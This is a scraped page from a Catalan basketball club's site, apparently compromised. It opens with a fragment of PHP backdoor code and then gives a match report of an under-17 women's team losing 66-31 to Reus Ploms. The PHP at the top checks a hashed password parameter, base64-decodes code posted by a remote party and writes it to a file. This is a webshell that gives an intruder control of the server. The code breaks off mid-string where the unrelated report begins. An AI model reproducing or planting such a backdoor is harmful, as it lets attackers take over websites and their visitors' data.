function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Júnior fem 06/07B cau VS Reus Ploms (66-31) - Tgn Bàsquet Club -

El Júnior fem 06/07B cau VS Reus Ploms (66-31)

Updated: desembre 5, 2023

Caiem a la pista del Reus Ploms en un partit de dues cares. La sortida intensa i constant tant en defensa com en atac dels dos primers quarts queda tapada per una segona part fluixa.

Les noies arranquen el partit amb les idees clares i un joc en atac ràpid i ordenat, en el que costa arribar al premi final de l’encert. Tot i això, aconseguim mantenir el partit ajustat amb el treball en defensa.

Notem desgast físic i mental davant un rival de joc dur i un partit bastant brut. I aquest cansament ens juga una mala passada a la segona part, on les jugadores es tornen incapaces de frenar el contraatac reusenc.

Marxem amb la mirada posada en la situació de no saber remuntar davant la inferioritat en el marcador, havent fet bé la feina durant els primers 20 minuts. Resultat poc just per la lluita de les liles, però amb l’aprenentatge fet. 1,2,3, TGN!

Reus Ploms Salle U17 66 – 31 TGN Basquet 06-07B